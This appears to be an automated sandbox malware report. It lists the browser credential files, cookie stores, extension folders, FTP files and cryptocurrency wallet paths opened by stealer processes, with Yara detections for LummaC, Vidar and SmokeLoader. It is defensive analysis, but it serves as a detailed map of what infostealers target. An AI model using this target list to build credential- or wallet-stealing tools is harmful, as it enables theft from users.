Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\backups\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Temp\A247.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000005.00000003.2678333691.0000000000913000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3157954757.0000000000572000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: A247.exe PID: 6204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kat2225.tmp PID: 6716, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected CryptOne packer
Source: Yara match File source: 00000008.00000002.2674561163.00000000043B9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: A247.exe PID: 6204, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 00000000.00000002.2056480507.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2056438755.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2319442146.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Yara detected Vidar
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 8.2.5358.exe.4387719.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.2590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.4387719.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.45b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.45b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.2590000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5358.exe PID: 4296, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kat2225.tmp PID: 6716, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
